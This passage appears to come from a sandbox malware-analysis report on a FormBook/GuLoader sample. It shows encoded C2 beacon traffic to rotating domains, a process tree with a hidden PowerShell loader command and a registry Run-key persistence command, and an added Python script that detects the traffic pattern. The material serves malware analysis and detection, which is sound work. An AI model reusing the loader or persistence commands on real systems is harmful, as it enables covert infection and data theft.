                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>


Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49751 | Destination IP: 66.29.135.159 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 17:17:58.706362963 CEST | 758 | OUT | POST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.eternalsunrise.xyz
                                                                      Origin: http://www.eternalsunrise.xyz
                                                                      Referer: http://www.eternalsunrise.xyz/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 79 74 36 53 4d 41 6e 55 4d 6d 6b 4e 4a 59 49 37 34 6d 54 72 6d 6e 5a 55 63 2f 6d 75 75 75 50 42 59 79 48 4a 6f 6c 57 63 4e 61 4a 51 48 64 55 65 79 39 4e 52 74 47 72 49 4c 71 2b 51 44 75 6e 57 41 64 51 2f 32 37 33 74 58 34 78 6f 30 47 75 71 6a 4c 49 35 65 61 68 6e 76 53 4a 68 62 63 44 67 62 61 36 62 6d 31 47 41 75 41 50 4c 49 43 58 77 46 30 34 79 41 6f 67 47 50 59 33 36 36 77 59 6e 58 47 66 73 76 48 49 2b 6a 6b 4e 68 69 49 74 39 4a 4a 46 5a 51 47 79 57 4a 70 7a 47 6d 51 73 44 30 6a 66 79 76 68 65 5a 30 79 51 79 32 75 4f 52 35 61 37 53 48 79 6a 56 48 36 58 65 4d 63 4e 4f 2b 41 3d 3d
                                                                      Data Ascii: edR0hF=yt6SMAnUMmkNJYI74mTrmnZUc/muuuPBYyHJolWcNaJQHdUey9NRtGrILq+QDunWAdQ/273tX4xo0GuqjLI5eahnvSJhbcDgba6bm1GAuAPLICXwF04yAogGPY366wYnXGfsvHI+jkNhiIt9JJFZQGyWJpzGmQsD0jfyvheZ0yQy2uOR5a7SHyjVH6XeMcNO+A==
Apr 16, 2024 17:17:58.903675079 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 16 Apr 2024 15:17:58 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49752 | Destination IP: 66.29.135.159 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 17:18:01.771581888 CEST | 778 | OUT | POST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.eternalsunrise.xyz
                                                                      Origin: http://www.eternalsunrise.xyz
                                                                      Referer: http://www.eternalsunrise.xyz/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 79 74 36 53 4d 41 6e 55 4d 6d 6b 4e 49 37 67 37 31 6c 37 72 78 58 5a 58 54 66 6d 75 6e 4f 50 46 59 79 37 4a 6f 6b 53 32 4e 73 35 51 43 4e 6b 65 39 63 4e 52 75 47 72 49 42 4b 2b 56 4a 4f 6e 5a 41 64 4d 42 32 2b 50 74 58 35 52 6f 30 43 71 71 69 36 49 36 65 4b 68 68 32 43 4a 6a 46 73 44 67 62 61 36 62 6d 31 6a 58 75 41 58 4c 4c 79 4c 77 45 57 51 78 47 59 67 46 4f 59 33 36 73 41 59 37 58 47 65 4a 76 45 4e 6c 6a 6d 31 68 69 4a 39 39 4a 59 46 47 61 47 7a 64 4e 70 79 6a 68 51 70 7a 32 54 32 6a 76 42 66 32 39 42 67 41 33 6f 66 4c 6f 72 61 46 56 79 48 6d 61 39 65 71 42 66 77 48 6c 46 62 6f 39 43 2b 5a 68 61 62 6c 2b 57 6e 32 35 38 62 56 6a 77 49 3d
                                                                      Data Ascii: edR0hF=yt6SMAnUMmkNI7g71l7rxXZXTfmunOPFYy7JokS2Ns5QCNke9cNRuGrIBK+VJOnZAdMB2+PtX5Ro0Cqqi6I6eKhh2CJjFsDgba6bm1jXuAXLLyLwEWQxGYgFOY36sAY7XGeJvENljm1hiJ99JYFGaGzdNpyjhQpz2T2jvBf29BgA3ofLoraFVyHma9eqBfwHlFbo9C+Zhabl+Wn258bVjwI=
Apr 16, 2024 17:18:01.963171005 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 16 Apr 2024 15:18:01 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
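The sessions above share one shape: a fixed iPhone User-Agent on every request, the same URI path /9pdo/ requested on three unrelated domains (www.n-benriya002.com, www.scwspark.com, www.eternalsunrise.xyz), GETs whose query parameter carries standard base64 with unencoded + and / characters, and POSTs whose form body is a single parameter (edR0hF) holding the same kind of blob, with Origin and Referer pointing at the contacted host itself. The Python script below is an added example written for this page; it is not Joe Sandbox output and not code from the sample. It re-creates sessions 9, 10 and 14 from the report as constructed records (sessions 11 to 13 have the same shape and are left out for brevity) plus one made-up benign request for contrast, scores each request against those indicators, decodes each blob to report its byte entropy, and lists every URI path that flagged requests reuse across more than one host. The regex bounds, indicator names and the benign record are the example's own choices.

```python
import base64
import math
import re
from collections import defaultdict
from urllib.parse import urlsplit

# User-Agent carried by every request in the sessions above.
FORMBOOK_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 "
               "(KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4")
# Standard (not URL-safe) base64 of at least 40 characters, '=' padding included.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
# A form body that is exactly one short parameter name holding such a blob.
FORM_RE = re.compile(r"^([A-Za-z0-9]{4,8})=([A-Za-z0-9+/]{40,}={0,2})$")

# Constructed from sessions 9, 10 and 14 above, reduced to the fields the checks use;
# session 99 is a made-up benign request that must not be flagged.
SESSIONS = [
    {"id": 9, "method": "GET", "host": "www.n-benriya002.com",
     "target": "/9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2",
     "headers": {"User-Agent": FORMBOOK_UA}, "body": ""},
    {"id": 10, "method": "POST", "host": "www.scwspark.com", "target": "/9pdo/",
     "headers": {"User-Agent": FORMBOOK_UA, "Origin": "http://www.scwspark.com",
                 "Referer": "http://www.scwspark.com/9pdo/"},
     "body": "edR0hF=TzjisiIsCoJ7Js9j05EXY5bf7Mu7XcaSybFhM24UfdGB3ypoEW+5UbwLRzXolp9SUrttKmiTmMgx2p50cGQF7FW6BIaPE0AT9ruWbUypDkTj6iYoY5VWmQ4SqOs6GbjSy/aT+Jo/N9s2sJk9q99MGF2wlkFvh/i+lhsRmpgZYJZQanFQahRXnlSy0ZDV8gj81w=="},
    {"id": 14, "method": "POST", "host": "www.eternalsunrise.xyz", "target": "/9pdo/",
     "headers": {"User-Agent": FORMBOOK_UA, "Origin": "http://www.eternalsunrise.xyz",
                 "Referer": "http://www.eternalsunrise.xyz/9pdo/"},
     "body": "edR0hF=yt6SMAnUMmkNJYI74mTrmnZUc/muuuPBYyHJolWcNaJQHdUey9NRtGrILq+QDunWAdQ/273tX4xo0GuqjLI5eahnvSJhbcDgba6bm1GAuAPLICXwF04yAogGPY366wYnXGfsvHI+jkNhiIt9JJFZQGyWJpzGmQsD0jfyvheZ0yQy2uOR5a7SHyjVH6XeMcNO+A=="},
    {"id": 99, "method": "GET", "host": "www.example.com", "target": "/index.html?q=hello",
     "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/124.0"}, "body": ""},
]


def raw_query_params(target):
    """Split the query string without decoding it: the blob's '+' and '/' are not
    percent-encoded, so urllib.parse.parse_qsl() would turn every '+' into a space."""
    _, _, query = target.partition("?")
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name:
            yield name, value


def shannon_entropy(data):
    """Bits per byte: near 8 for encrypted or random bytes, roughly 4 to 5 for text."""
    if not data:
        return 0.0
    counts = defaultdict(int)
    for byte in data:
        counts[byte] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts.values())


def extract_blob(req):
    """Return (parameter name, base64 text) for the single blob a request carries, or None."""
    if req["method"] == "GET":
        for name, value in raw_query_params(req["target"]):
            if B64_RE.match(value) and ("+" in value or "/" in value):
                return name, value
    elif req["method"] == "POST":
        m = FORM_RE.match(req["body"])
        if m:
            return m.group(1), m.group(2)
    return None


def score_request(req):
    """Per-request indicators; 'suspicious' requires the fixed UA plus a blob."""
    path = urlsplit(req["target"]).path
    hdr = req["headers"]
    blob = extract_blob(req)
    indicators = {
        "formbook_ua": hdr.get("User-Agent") == FORMBOOK_UA,
        "b64_blob": blob is not None,
        # Origin/Referer name the contacted host itself, as if a page there posted the form.
        "self_referer": (hdr.get("Origin") == f"http://{req['host']}"
                         and hdr.get("Referer") == f"http://{req['host']}{path}"),
    }
    entropy = None
    if blob is not None:
        try:
            entropy = shannon_entropy(base64.b64decode(blob[1]))
        except ValueError:
            pass
    return {"id": req["id"], "host": req["host"], "path": path,
            "param": blob[0] if blob else None, "entropy": entropy,
            "indicators": indicators,
            "suspicious": indicators["formbook_ua"] and indicators["b64_blob"]}


def c2_rotation(results):
    """URI paths that suspicious requests reuse on two or more hosts; one path
    hit on several unrelated domains is the domain rotation visible above."""
    hosts_by_path = defaultdict(set)
    for r in results:
        if r["suspicious"]:
            hosts_by_path[r["path"]].add(r["host"])
    return {p: sorted(h) for p, h in hosts_by_path.items() if len(h) >= 2}


def analyse(sessions=SESSIONS):
    results = [score_request(s) for s in sessions]
    return results, c2_rotation(results)


if __name__ == "__main__":
    results, rotation = analyse()
    for r in results:
        flags = ",".join(k for k, v in r["indicators"].items() if v) or "-"
        ent = f"{r['entropy']:.2f}" if r["entropy"] is not None else "n/a"
        print(f"session {r['id']:>3} {r['host']:<24} {r['path']:<12} param={r['param']} entropy={ent} [{flags}]")
    for path, hosts in rotation.items():
        print(f"path {path} reused across {len(hosts)} hosts: {', '.join(hosts)}")
```

The query string is split by hand on purpose: the blob's '+' is not percent-encoded, so a standards-conforming form parser would turn it into a space and the base64 check would silently fail. Real input would come from a proxy log or a pcap parser; on the records above the script flags sessions 9, 10 and 14, reports the decoded blobs as high-entropy, and lists /9pdo/ as reused across all three domains.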


                                                                      Target ID:0
                                                                      Start time:17:15:53
                                                                      Start date:16/04/2024
                                                                      Path:C:\Users\user\Desktop\160420241245287.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\160420241245287.exe"
                                                                      Imagebase:0x400000
                                                                      File size:906'138 bytes
                                                                      MD5 hash:0FAF0632777806D9E8C13F1CA6FC3237
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:17:15:54
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"
                                                                      Imagebase:0x600000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2067336932.000000000BC43000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:17:15:54
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:17:15:55
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:17:16:30
                                                                      Start date:16/04/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Untapestried.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Untapestried.exe"
                                                                      Imagebase:0x400000
                                                                      File size:906'138 bytes
                                                                      MD5 hash:0FAF0632777806D9E8C13F1CA6FC3237
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 11%, ReversingLabs
                                                                      • Detection: 18%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:17:16:33
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
                                                                      Imagebase:0x7ff71e800000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:17:16:33
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:17:16:33
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
                                                                      Imagebase:0x920000
                                                                      File size:59'392 bytes
                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:17:16:38
                                                                      Start date:16/04/2024
                                                                      Path:C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe"
                                                                      Imagebase:0xa40000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:12
                                                                      Start time:17:16:39
                                                                      Start date:16/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\cmd.exe"
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:13
                                                                      Start time:17:16:52
                                                                      Start date:16/04/2024
                                                                      Path:C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe"
                                                                      Imagebase:0xa40000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:14
                                                                      Start time:17:17:04
                                                                      Start date:16/04/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff6bf500000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true


                                                                        Execution Graph

                                                                        Execution Coverage:21%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:25.6%
                                                                        Total number of Nodes:1393
                                                                        Total number of Limit Nodes:32
GetTickCount GetModuleFileNameW 3734->3801 3735->3731 3738 403532 3736->3738 3738->3734 3740 403536 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3738->3740 3739 403580 3742 403618 3739->3742 3746 403608 3739->3746 3747 405962 CharNextW 3739->3747 3745 403326 11 API calls 3740->3745 3885 405eea lstrcpynW 3741->3885 3888 4037c2 3742->3888 3750 403564 3745->3750 3831 4038b4 3746->3831 3751 40359b 3747->3751 3750->3734 3750->3742 3758 4035e2 3751->3758 3759 403647 lstrcatW lstrcmpiW 3751->3759 3752 403631 3755 4056c6 MessageBoxIndirectW 3752->3755 3753 403727 3754 4037aa ExitProcess 3753->3754 3756 406254 3 API calls 3753->3756 3760 40363f ExitProcess 3755->3760 3761 403736 3756->3761 3762 405a3d 18 API calls 3758->3762 3759->3742 3763 403663 CreateDirectoryW SetCurrentDirectoryW 3759->3763 3764 406254 3 API calls 3761->3764 3765 4035ee 3762->3765 3766 403686 3763->3766 3767 40367b 3763->3767 3768 40373f 3764->3768 3765->3742 3886 405eea lstrcpynW 3765->3886 3898 405eea lstrcpynW 3766->3898 3897 405eea lstrcpynW 3767->3897 3771 406254 3 API calls 3768->3771 3773 403748 3771->3773 3776 403796 ExitWindowsEx 3773->3776 3782 403756 GetCurrentProcess 3773->3782 3774 4035fd 3887 405eea lstrcpynW 3774->3887 3775 405f0c 18 API calls 3778 4036c5 DeleteFileW 3775->3778 3776->3754 3779 4037a3 3776->3779 3780 4036d2 CopyFileW 3778->3780 3788 403694 3778->3788 3781 40140b 2 API calls 3779->3781 3780->3788 3781->3754 3785 403766 3782->3785 3783 40371b 3786 405d84 40 API calls 3783->3786 3784 405d84 40 API calls 3784->3788 3785->3776 3786->3742 3787 405f0c 18 API calls 3787->3788 3788->3775 3788->3783 3788->3784 3788->3787 3790 403706 CloseHandle 3788->3790 3899 405665 CreateProcessW 3788->3899 3790->3788 3791->3722 3792->3724 3794 40617e 5 API calls 3793->3794 3795 403332 3794->3795 3796 40333c 